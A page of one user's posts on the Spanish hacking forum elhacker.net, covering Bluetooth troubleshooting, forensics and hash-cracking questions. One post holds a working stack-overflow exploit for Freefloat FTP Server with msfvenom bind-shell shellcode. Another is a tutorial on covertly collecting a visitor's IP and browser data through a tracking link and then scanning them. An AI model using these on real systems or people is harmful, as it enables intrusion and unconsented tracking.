elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Temas
Páginas: 1 2 3 [4] 5
31  Comunicaciones / Hacking Mobile / [Bluetooth] Problemas en 2016 llevando a la práctica material de hace 10 años en: 7 Diciembre 2016, 09:38 am
Muy buenas a todos! Estaba leyendo el manual de seguridad en bluetooth de 170 páginas (del 2005) que encontré aquí en elhacker.net, llegué más o menos a la página 110, la verdad está excelente y aprendi un montón, pero siempre me pasa lo mismo, que cuando quiero volcar la teoría en la práctica me encuentro con 985329589234523485923485 problemas inesperados. Antes de empezar a leer, probé intercambiar archivos entre un LG viejo (con tapita, no tactil, no wifi, no smartphone), y mi Alcatel One Touch Pop S3, y pude comunicarlos excitosamente por bluetooth. Ahora desde Kali pude emparejar a los dispositivos (Notebook con Kali 2.0 y el Alcatel One Touch Pop S3), pero cuando quiero hacer una transferencia de archivos por ejemplo, tanto del celular a la pc como de la pc al celular, no estoy pudiendo. Desde el celular a la pc me salta un cartel que dice conexion erronea, o algo parecido. Desde la pc al celular probé a través de la interfaz gráfica y no pude, probé a través del obexftp y obtengo el siguiente resultado:

Código:
root@skali:~# obexftp -v -b B0:E0:3C:XX:XX:XX -B 20 -p /root/imagen.png
Connecting..\done
Sending "/root/imagen.png"...|failed: /root/imagen.png
The operation failed with return code 80
Disconnecting../done

Busqué en google: "The operation failed with return code 80" y no encontré ni un solo resultado... Sin las comillas encuentro problemas con distintos códigos de errores, pero ninguno con 80. También probé usar Wifislax en lugar de Kali y me pasó exactamente lo mismo. No pude probar con otro celular porque no tengo a mi alcance. De todos modos la primera vez hace mucho que probé transferir archivos desde el LG a mi Alcatel, lo pude hacer, asi que por eso me imagino q el problema tiene más que ver con la PC que con el celular.

Tuve dos problemas más, pero que tengo una idea de lo que puede llegar a ser, y me gustaría que me indicaran si estoy acertado o me estoy equivocando, porque quedarme con la duda es algo que me hace muuuuuy mal jajaja.

El segundo problema con el que me encontré, fue en BlueLine, al agregar los caracteres especiales de salto de linea, el celular me los representa como espacios, y no puedo llegar a alterar todo el mensaje como se veía en el pdf que les cuento... Supongo que ésto servía para ciertas versiones viejas de móviles. Corrijanme si me equivoco...

El tercer problema fue cuando quise ejecutar comandos AT sobre una sesion rfcomm:

Código:
root@skali:~# rfcomm connect 0 B0:E0:3C:XX:XX:XX 2
Connected /dev/rfcomm0 to B0:E0:3C:XX:XX:XX on channel 2
Press CTRL-C for hangup

root@skali:~# cu -l rfcomm0 -s 9600
cu: open (/dev/rfcomm0): Permission denied
cu: rfcomm0: Line in use

Éste problema ya lo tuvieron y lo contestaron en éste mismo foro aquí en éste enlace:
https://foro.elhacker.net/hacking_mobile/problemas_con_bluetooth-t93112.0.html

En mi caso, el problema supongo que tiene que ver con:

Citar
También debes estar seguro de q el canal al q te quieres conectar con rfcomm es el asociado al perfil q buscas: puerto serie o dial up network...

Estoy usando una comunicacion en el canal 2 que no es ni de puerto serie ni de dial up network, ya que esos servicios no estaban disponibles en mi movil. Aqui les muestro los que si:

Código:
Service RecHandle: 0x10000
Service Class ID List:
  "Generic Attribute" (0x1801)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 31
  "ATT" (0x0007)
    uint16: 0x0001
    uint16: 0x0005

Service RecHandle: 0x10001
Service Class ID List:
  "Generic Access" (0x1800)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 31
  "ATT" (0x0007)
    uint16: 0x0014
    uint16: 0x001e

Service Name: Headset Gateway
Service RecHandle: 0x10002
Service Class ID List:
  "Headset Audio Gateway" (0x1112)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2
Profile Descriptor List:
  "Headset" (0x1108)
    Version: 0x0102

Service Name: Handsfree Gateway
Service RecHandle: 0x10003
Service Class ID List:
  "Handsfree Audio Gateway" (0x111f)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 3
Profile Descriptor List:
  "Handsfree" (0x111e)
    Version: 0x0106

Service Name: AV Remote Control Target
Service RecHandle: 0x10004
Service Class ID List:
  "AV Remote Target" (0x110c)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x0102
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0103

Service Name: Advanced Audio
Service RecHandle: 0x10005
Service Class ID List:
  "Audio Source" (0x110a)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 25
  "AVDTP" (0x0019)
    uint16: 0x0102
Profile Descriptor List:
  "Advanced Audio" (0x110d)
    Version: 0x0102

Service Name: Android Network Access Point
Service Description: NAP
Service RecHandle: 0x10006
Service Class ID List:
  "Network Access Point" (0x1116)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 15
  "BNEP" (0x000f)
    Version: 0x0100
    SEQ8: 0 6
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "Network Access Point" (0x1116)
    Version: 0x0100

Service Name: OBEX Phonebook Access Server
Service RecHandle: 0x10008
Service Class ID List:
  "Phonebook Access - PSE" (0x112f)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 19
  "OBEX" (0x0008)
Profile Descriptor List:
  "Phonebook Access" (0x1130)
    Version: 0x0101

Service Name: OBEX Object Push
Service RecHandle: 0x10009
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 12
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Service Name: SMS/MMS Message Access
Service RecHandle: 0x1000a
Service Class ID List:
  "Message Access - MAS" (0x1132)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 16
  "OBEX" (0x0008)
Profile Descriptor List:
  "Message Access" (0x1134)
    Version: 0x0100

Service Name: Email Message Access
Service RecHandle: 0x1000b
Service Class ID List:
  "Message Access - MAS" (0x1132)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 17
  "OBEX" (0x0008)
Profile Descriptor List:
  "Message Access" (0x1134)
    Version: 0x0100

Service Name: SIM Access Server
Service RecHandle: 0x1000d
Service Class ID List:
  "SIM Access" (0x112d)
  "Generic Telephony" (0x1204)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 15
Profile Descriptor List:
  "SIM Access" (0x112d)
    Version: 0x0101

Service Name: OBEX File Transfer
Service RecHandle: 0x1000e
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 20
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX File Transfer" (0x1106)
    Version: 0x0101

Probé con sesiones rfcomm en varios canales pero siempre con el mismo error, supongo que ya mi dispositivo de por si al no tener servicio de puerto serie ni dial up, no tengo ninguna otra forma para utilizar una sesion rfcomm para ejecutar comandos AT. Corrijanme si me equivoco...

Otro dato es que el archivo de configuración /etc/buetooth/hci.conf que menciona el pdf, yo no lo tengo, pero tengo otros cuatro: input.conf  main.conf  network.conf  proximity.conf

Bueno! Espero que me ayuden a resolver el primer problema que es el que más me preocupa! Y en cuanto los otros dos problemas solo quiero saber si estoy acertado en mi pensamiento o estoy equivocado. Saludos y gracias desde ya!
32  Foros Generales / Foro Libre / El guason está relacionado con el mundo del hacking? en: 14 Noviembre 2016, 05:43 am
Buenas! No miré mucho de batman, recuerdo haber visto batman inicia hace varios años pero no recuerdo casi nada de la película en sí. He visto que la imagen del guason es muy utilizada por integrantes de ésta comunidad, y me mató la curiosidad el hecho de saber si tiene alguna ralación con el mundo del hacking, o de la informática en general, alguna relación en ideologías o si tiene más que ver con el actor. Saludos!
33  Seguridad Informática / Bugs y Exploits / Sobreescribo EIP pero no logro que se ejecute mi shellcode en: 5 Noviembre 2016, 21:13 pm
Muy buenas! Les comento mi inconveniente. Estaba tratando de explotar el servidor FTP Freefloat 1.0, el cuál tiene un fallo de stack overflow. Estoy usando VM con Windows Profesional SP2 Version 2002, ESP (ip 192.168.0.107), y otra VM con Kali 2.0 (ip 192.168.0.106). Probando con el fuzzer de ftp de metasploit, logré crasharlo mandando una cadena muy larga junto con el comando USER. Luego con el pattern_create.rb y pattern_offset.rb determiné que hay 230 bytes hasta sobreescribir EIP. Escribí un exploit y logré escribir 42424242 en EIP. Como pueden ver en la siguiente imagen:



Luego, creé varias shellcodes con msfvenom. Primero probé meterpreter/reverse_tcp, ahora estoy probando con shell/bind_tcp, pero no estoy consiguiendo la shell...  Después de ejecutar el exploit, el Immunity muestra lo siguiente:



Estoy utilizando la técnica de sobreescribir EIP por la dirección de USER.dll que apunta a JMP ESP. Y me parece que hasta aquí funciona, es decir, EIP logra llegar al stack, como ven en la imagen anterior... Por si las moscas, aca les muestro la dirección de JMP ESP:



Y mi código final del exploit:

Código
  1. #!/usr/bin/python
  2. import socket
  3.  
  4. target = "192.168.0.107"
  5. junk = "\x41" * 230
  6. eip = "\x0a\xaf\xd5\x77"
  7. nops = "\x90" * 30
  8. #msfvenom -a \x86 --platform windows -p "windows/shell/bind_tcp" LHOST=192.168.0.107 LPORT=4444 -b '\x00' -f python
  9. #Payload size: 326 bytes
  10. #Final size of python file: 1574 bytes
  11. payload =  ""
  12. payload += "\xdb\xd5\xba\xf1\x47\xde\x08\xd9\x74\x24\xf4\x58\x2b"
  13. payload += "\xc9\xb1\x4b\x31\x50\x1a\x83\xc0\x04\x03\x50\x16\xe2"
  14. payload += "\x04\xbb\x36\x8a\xe6\x44\xc7\xeb\x6f\xa1\xf6\x2b\x0b"
  15. payload += "\xa1\xa9\x9b\x58\xe7\x45\x57\x0c\x1c\xdd\x15\x98\x13"
  16. payload += "\x56\x93\xfe\x1a\x67\x88\xc2\x3d\xeb\xd3\x16\x9e\xd2"
  17. payload += "\x1b\x6b\xdf\x13\x41\x81\x8d\xcc\x0d\x37\x22\x78\x5b"
  18. payload += "\x8b\xc9\x32\x4d\x8b\x2e\x82\x6c\xba\xe0\x98\x36\x1c"
  19. payload += "\x02\x4c\x43\x15\x1c\x91\x6e\xec\x97\x61\x04\xef\x71"
  20. payload += "\xb8\xe5\x43\xbc\x74\x14\x9a\xf8\xb3\xc7\xe9\xf0\xc7"
  21. payload += "\x7a\xe9\xc6\xba\xa0\x7c\xdd\x1d\x22\x26\x39\x9f\xe7"
  22. payload += "\xb0\xca\x93\x4c\xb7\x95\xb7\x53\x14\xae\xcc\xd8\x9b"
  23. payload += "\x61\x45\x9a\xbf\xa5\x0d\x78\xde\xfc\xeb\x2f\xdf\x1f"
  24. payload += "\x54\x8f\x45\x6b\x79\xc4\xf4\x36\x16\x29\x34\xc9\xe6"
  25. payload += "\x25\x4f\xba\xd4\xea\xfb\x54\x55\x62\x25\xa2\x9a\x59"
  26. payload += "\x91\x3c\x65\x62\xe1\x15\xa2\x36\xb1\x0d\x03\x37\x5a"
  27. payload += "\xce\xac\xe2\xf6\xc5\x0b\x5d\xe4\x27\xc1\x5c\x82\xd5"
  28. payload += "\x7e\xb5\x5d\x05\x9e\xb6\xb4\x2e\x37\x4b\x36\x40\x94"
  29. payload += "\xc2\xd0\x08\x34\x83\x4b\xa5\xf6\xf0\x44\x52\x08\xd3"
  30. payload += "\x2f\x5c\x83\x84\x78\x35\xdb\xdc\xbe\x3a\xdc\xca\xe9"
  31. payload += "\xac\x57\x19\x2e\xcc\x67\x34\x07\x99\xf0\xc2\xc9\xe8"
  32. payload += "\x61\xd2\xc0\x99\x61\x46\xee\x0b\x35\xfe\xec\x6a\x71"
  33. payload += "\xa1\x0f\x59\x01\xa6\xef\x1c\x2b\xdc\xd9\x8a\x73\x8a"
  34. payload += "\x25\x5b\x74\x4a\x73\x31\x74\x22\x23\x61\x27\x57\x2c"
  35. payload += "\xbc\x5b\xc4\xb8\x3f\x0a\xb8\x6b\x28\xb0\xe7\x5b\xf7"
  36. payload += "\x4b\xc2\xd8\xf0\xb4\x93\xd9\x01\x76\x42\x23\x74\x91"
  37. payload += "\x56"
  38.  
  39.  
  40. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  41. s.connect((target,21))
  42. print "\n\n[-] Sending exploit ..."
  43. print s.recv(2000)
  44. s.send("USER "+junk+eip+nops+payload+"\r\n")
  45. s.close()
  46.  

Probé también cambiando la cantidad de NOPS. Nunca termine de entender muy bien para que sirven esos NOPS que están después de la dirección de retorno... Supongo que para hacer espacio hasta llegar a ESP, pero no entiendo bien que cantidad usar... Si me pueden aclarar ésta duda les agradecería...

Más allá de esa dudita, no creo que sea problema de NOPS, se me ocurre que hay algúna medida de mitigación que está activada y no me doy cuenta. Si necesitan algo más para ayudarme con ésto para que pueda comprender bien como explotar correctamente el bug, estaría agradecidicimo!!! Saludos y gracias desde ya.

MOD: Imagenes adaptadas a lo permitido.
34  Informática / Electrónica / Se levantó la pintura conductora del power del control remoto en: 12 Octubre 2016, 15:08 pm
Muy buenas a todos, quería comentarles de un problema que tengo con mi remoto. Estan funcionando todos los botones menos el power.

Aca una imágen del mismo:



Como ven se levantó la pintura conductora del power (fijense arriba a la izquierda). Mi viejo había probado pasarle alcohol isopropílico pero en el intento se estaban por dañar las pistas.

Quería saber si hay alguna forma para resolver éste problema. Aclaro que no poseo muchos conocimientos en electrónica, asi que si me equivoco en algo me corrigen, y espero que me sepan ayudar.

Saludos y gracias!

MOD: Imagen adaptada a lo dictado por las reglas del foro (800x600 máx.)
35  Foros Generales / Dudas Generales / Forensia - Como pueden estar seguros de quien fue el atacante? en: 31 Agosto 2016, 23:14 pm
Que tal? Hoy pensando un poco sobre ésto, se me planteo la duda de cómo a través de una IP se puede llegar a determinar que persona fue la responsable de un determinado ataque, ya sea algún escaneo de puertos, o alguna inyección SQL que quede almacenada en un log... Se que la víctima puede pedir al ISP el nombre del asociado de determinada IP a tal hora, pero mi pregunta es... Como pueden determinar que el que realizó el ataque es el mismo asociado de la IP y no otro hacker que utilizó la PC del asociado de la IP???

Para que se entienda mi duda....
Yo soy Marcos, y el señor Josesito a través de un troyano logró entrar a través de internet a mi PC...

Josesito a través de mi PC tiene la idea de hacer una inyección SQL a determinada web... El admin revisa el log de Apache y se encuentra con mi IP y con la cadena maliciosa, entonces llama a mi ISP y el ISP le deja mi nombre...

Entonces yo tendría que pagar el precio de la actividad ilicita? O a través de alguna técnica se puede ubicar a Josesito?

Saludos y gracias por aclarar mis dudas
36  Seguridad Informática / Criptografía / Tiempos de crackeo para las diferentes técnicas en: 3 Agosto 2016, 02:50 am
Muy buenas a todos, algo que nunca me quedó muy claro es por qué dicen que hay algoritmos de hash más dificiles de crackear que otros, si el método para crackear los hashes es el mismo (usando fuerza bruta o diccionario y comparando con el hash)? Lo que me resultaría lógico es que el procesador tarde más tiempo en cifrar una clave con un algoritmo que con otro, entonces cifrar un millon de claves con sha tardaría mas tiempo que cifrar un millon de claves en md5, x ejemplo, pero no estoy seguro de estar en lo cierto....

Y la otra duda, es si hay mucha diferencia entre el tiempo de crackeo de hashes y el tiempo de crackeo online que se realiza con el hydra...

Saludos y gracias desde ya por ayudarme a entender!
37  Programación / Scripting / Script para mostrar IP's de los dominios que aparecen en una búsqueda de Google en: 13 Julio 2016, 02:28 am
Que tal gente, quería hacer un pequeño script en python, ya tengo todo en la mente. Básicamente uso una libreria para navegar x la web, leo del teclado un uri para luego enviar la consulta con un inurl:uri en el parametro q, de consulta de google. Despues parseo la respuesta para quedarme solo con los nombres de los dominios, los filtro para sacar el www. y lo que esta a partir del uri, para poder hacer un ping, con cada uno de los dominios fitlrados, parsear los resultados del ping para quesarte con la ip, y despues guardar en un archivo linea por línea todas las ips...

Los problemas que me surgieron son los siguientes:
1) No se que parámetro se usa para manejar el numero de pagina de google, porque se supone que se tiene que ir recorriendo todas las paginas hasta que ya no haya mas resultados.
2) Seguramente despues de navegar por un par de paginas me pida un captcha, tienen idea como bypassearlo?

Gracias por la ayuda, si me dan una mano con ésto, despues subo el script terminado!

Saludos
38  Foros Generales / Foro Libre / Algun amante de la seguridad que viva en Argentina Bs.As. La Plata? en: 2 Enero 2016, 02:23 am
Hola, básicamente quería saber si alguno de ustedes vive en mi ciudad para juntarnos y compartir lo que estamos aprendiendo. Porque participar en el foro está genial pero poder compartir las cosas personalmente estaría mejor todavía... No tengo auto ni nada como para moverme, sino estaría bueno hacer algún encuentro en capital ya que seguramente la mayoría de miembros argentinos de la comunidad viva en capital... Hace unos meses se hizo la EKO party, no pude ir por motivos económicos pero de todas formas estaría bueno hacer algo no tan grande, como una juntada en la casa de alguno de nosotros...

Bueno, espero que haya por lo menos algun platense! jajaja Saludos!
39  Seguridad Informática / Seguridad / [Aporte] Rastrear información de otra PC con un simple link en: 21 Diciembre 2015, 17:22 pm
Hola que tal muy buenas a todos! Éste va a ser mi primer aporte ya que el resto de los posts eran solo para sacarme dudas yo... Ya me ayudaron bastante asi que merecen algún aporte por más pequeño que sea de mi parte jaja...

ACLARACIÓN: esta información como cualquier otra que encontremos en ésta web puede ser utilizada tanto para bien como para mal. Mi intención es mostrarles los métodos que suelen usar los hackers para rastrear información. Experimenten con sus propios dispositivos...

Bueno empecemos! La idea básica es entender uno de los métodos de rastreo de IP, puertos, versiones de navegador, geolocalización, pluggins instalados, etc,etc más usados y efectivos. Básicamente con enviar un enlace (que va a corresponderse a nuestro propio servidor web) ya estamos recibiendo toda la información de la persona a atacar. Una vez que la otra persona acceda a nuestro enlace, a nosotros automáticamente se nos abrira el navegador mostrando un archivo .htm con el siguiente contenido:



Piensen en las miles de utilidades que nos puede dar el hecho de tener nuestro propio servidor web... Cada vez que alguien se conectaría a nosotros, siempre se almacena información del cliente en distintas variables, una de ellas es $_SERVER , un array que almacena version del navegador, sistema operativo del cliente, etc, etc... Éstos datos pueden ser útiles para tomar determinadas desiciones en la web, es decir, el programador que implemento la web podría utilizar algún campo de la variable $_SERVER para tomar una decisión u otra sobre lo que se va a mostrar en nuestro cliente. En nuestro caso solo usaríamos esa información para nuestro beneficio, una vez obtenida la ip, podemos hacer un escaneo con nmap, o muchas otras cosas...

Bueno, basta con la introducción, arranquemos con los pasos a seguir!

1 - En mi caso prefiero correr el servidor en Apache, sobre Kali Linux. Tipeamos
Código:
netstat -l -p

Netstat nos muestra información sobre las distintas conexiones que tenemos (el estado de los sockets), con la opción -l listamos todos los puertos en escucha y con la opción -p mostramos los PID (process ID) asociados con los sockets. Buscamos al principio si tenemos debajo de la columna Local Adress:  
Código:
[::]:http
Y si encontramos algo, utilizamos el comando:
Código:
kill PID
siendo PID el Process ID de la misma fila en la que encontramos [::]:http

Ésto quiere decir que tenemos ocupado nuestro puerto 80... A mi lo que me pasaba es que Kali arrancaba con el daemon del servidor nginx, y prefiero usar Apache, por ello todas éstas vueltas, si ustedes prefieren usar nginx, siéntanse libres de usarlo... El kill es para matar el proceso que estaba utilizando ese puerto para poder liberarlo...

2 - Vamos a crearnos una cuenta en NO-IP:

http://www.noip.com/

Ésto sirve para asociar nuestra ip con un nombre de dominio, para que la persona atacada acceda a través de un enlace como www.enlace.ddns.net y no directamente por nuestra dirección IP. Sería el servidor DNS el que terminaría devolviendo nuestra IP...

Okey, una vez que crearon la cuenta van a la sección que dice AddHost y agregan un dominio que a ustedes les guste y lo asocian a su IP pública extraída de éste sitio:

www.cualesmiip.com

3 - Vamos a configurar el router. Accedemos a nuestro router tipeando la dirección de la puerta de enlace predeterminada sobre nuestro navegador. Puede ser 192.168.0.1, 192.168.1.1, ustedes ya lo sabrán... Accedemos con las credenciales necesarias, si nunca le cambiaron el nombre/password, usen los que vienen por defecto que suelen ser ADMIN ADMIN... Una vez adentro vamos a la sección para abrir puertos, ésto ya depende de que marca de router esten utilizando. Ésta sección puede estar en la sección Forwarding, Virtual Servers, si tienen un TP-LINK o sino traten de encontrarla ustedes. Lo que hacemos es básicamente asociar lo que llega al puerto 80 a la IP local de la PC en la que tengamos corriendo el Apache, para obtenerla como sabrán se puede con ipconfig (windows) o ifconfig (linux)....

Okey, resumiendo... Éstas son cosas básicas que todos deberían de saber, pero de todas formas lo aclaro. Hasta ahora tenemos nuestro nombre de dominio, cuando alguien lo abra, el navegador va a tener que hacer una consulta al servidor DNS para que resuelva en nuestra IP pública... Luego llega el paquete del cliente a nuestro router, y el mismo es el que decide a cuál de todas las máquinas que tenemos en la red LAN se lo va a llevar. Nosotros en el paso 2 dijimos que todo lo que llegue al puerto 80, lo dirija a la máquina en la que tenemos corriendo Apache... Okey, prosigamos.


4 - Ejecutar apache:
Código:
service apache2 start

Una vez ejecutado ésto, tenemos nuestro servidor web Apache abierto escuchando en el puerto 80 (http) y 443 (https), eso quiere decir que si alguien se conecta a nosotros a traves del dominio que creamos, automáticamente pasaría a ejecutarse el index.php que se encuentre en el directorio /var/www/hml, ahora en el siguiente punto lo van a entender mejor.

5 - Descargar el script PHP creado por Redtoor desde el siguiente sitio:

https://github.com/RedToor/GetDataReport/blob/master/GetdataReport.php

Si tienen una web éste PHP lo pueden utilizar en el sitio que deseen, en nuestro caso vamos a renombrarlo index.php y localizarlo en la carpeta /var/www/html
En ésta última carpeta se almacenan los archivos a los cuales podemos acceder desde la web. index.php es lo primero que se ejecuta cuando alguien abre nuestra web.

Pueden ver la explicación del código fuente desde el siguiente enlace:
https://www.youtube.com/watch?v=ExzrVs6cnJQ

LISTO! Ahora dentro de nuestra carpeta /var/www/html se irán generando reportes de la información de las PC's que se conectaron a nosotros a través del dominio que creamos...

6 - Por su puesto todo ésto no tendría tanto sentido si no contribuyera con un script propio para añadir una nueva funcionalidad. Lo que hace el script hecho en bash que les voy a mostrar es esperar a que se cree el archivo de reporte, una vez creado se abre automáticamente con el iceweasel... Básicamente es eso, pero para lograrlo tuve que hacer un par de artimañas, para entenderlas les recomendaría leer mi código fuente y entender también el código fuente del PHP de Redtoor...
Aquí va el script:

Código
  1. #!/bin/bash
  2. #     ___         ______        ___
  3. #    / _ )__ __  / __/ /_____ _/ (_)
  4. #   / _  / // / _\ \/  '_/ _ `/ / /
  5. #  /____/\_, / /___/_/\_\\_,_/_/_/  
  6. #       /___/                      
  7. # _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _  
  8. #  _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
  9. #
  10. #  Éste script trabaja en conjunto con una modificación de la herramienta
  11. #  de reporte GetDataReport escrita en PHP por RedToor.
  12. #  Básicamente, espera a que exista el archivo generado para abrirlo automáticamente.
  13. #
  14. #  Link de la herramienta: https://github.com/RedToor/GetDataReport/blob/master/GetdataReport.php
  15. #
  16. #  Para que funcione es necesario comentar la linea 177 de la herramienta    //$n=rand(0,9000);
  17. #  Y modificar la línea 182  $open=fopen("Report-".$n.".htm",'w') or die ('Failed');
  18. #                      por:  $open=fopen("/var/www/html/Report/Report.htm",'w') or die ('Failed');
  19. #
  20. #  Con ésto evitamos que el PHP almacene el archivo con un número aleatorio para poder localizarlo
  21. #  univocamente con nustro script y que ésto sirva de disparador para poder abrirlo automáticamente.
  22. #  Una vez localizado, nuestro script es el que se encarga de cambiarle el nombre por otro aleatorio
  23. #  para almacenarlo, y finalmente se ejecuta el archivo con el iceweasel.
  24. #
  25. #  Se necesita tener un direcorio llamado Report dentro de /var/www/html, el script lo hace por vos:
  26. #
  27. pathFolder="/var/www/html/Report"; #Almacena el path de la carpeta para los reportes
  28. if [ ! -d $pathFolder ]; then #Si no existe la carpeta, la crea y le da todos los permisos
  29. mkdir $pathFolder;
  30. chmod 777 $pathFolder;
  31. fi
  32. #
  33. #
  34. ############# INTRODUZCA EL PATH DE SU REPORTE HTM AQUÍ ################
  35. path="/var/www/html/Report/Report.htm";
  36. # Éste path debe corresponderse con el que modificaron en:
  37. # $open=fopen("/var/www/html/Report/Report.htm",'w') or die ('Failed');
  38. ########################################################################
  39.  
  40. pathBegin=`echo $path | cut -d "." -f1`; #Almacena el principio del path hasta el "." (punto)
  41. pathExtension=`echo $path | cut -d "." -f2`; #Almacena la extensión del archivo
  42.  
  43. while [ 1 ]; do #Para dejarlo como daemon de forma persistente
  44.  
  45. pathRandom=`echo $pathBegin-$RANDOM.$pathExtension`; #Almacena el principio del path + un numero aleatorio + extención
  46.  
  47. if [ -f $path ]; then #Si ya existe un Reporte.htm , cambiarle el nombre por un Reporte + numero aleatorio
  48. mv $path $pathRandom;
  49. fi
  50.  
  51. while [ ! -f $path ]; do #Espera a que se cree el archivo llamado Reporte.htm en el path indicado
  52. sleep 1;
  53. done
  54.  
  55. mv $path $pathRandom; #Le cambia el nombre por un Reporte + numero aleatorio
  56.  
  57. iceweasel file://$pathRandom & #Se ejecuta automáticamente iceweasel en background abriendo el archivo generado
  58.  
  59. done;
  60.  

P.D.: Si tienen algún método para identificar también las versiones de los pluggins y podrían aportarlo se los agradecería mucho!
40  Seguridad Informática / Seguridad / Alguien obtuvo algún certificado de Offensive Security? en: 13 Diciembre 2015, 02:58 am
Hola que tal gente!!! Mi pregunta es esa, si alguno de ustedes consiguió un certificado... En caso afirmativo, qué tan complicado es obtenerlos? Cuál les parece el más facil y cuál el más dificil? A mi en lo personal me interesaría mucho obtener el de Explotation Expert, me encanta la parte de creación de exploits, reversing, técnicas para evadir al SO, al compilador, etc... Me falta mucho para ser bueno en ésto pero supongo que en 2 años más o menos podría estar lo suficientemente capacitado... Y la otra pregunta... Éstos certificados tienen mucho peso para las empresas? Si te certificas te empiezan a proponer muchas ofertas laborales para ser pentester? Y que piensan, existen certificados que tengan más peso que éstos que les digo?

Saludos y gracias por aportar su experiencia personal!
Páginas: 1 2 3 [4] 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines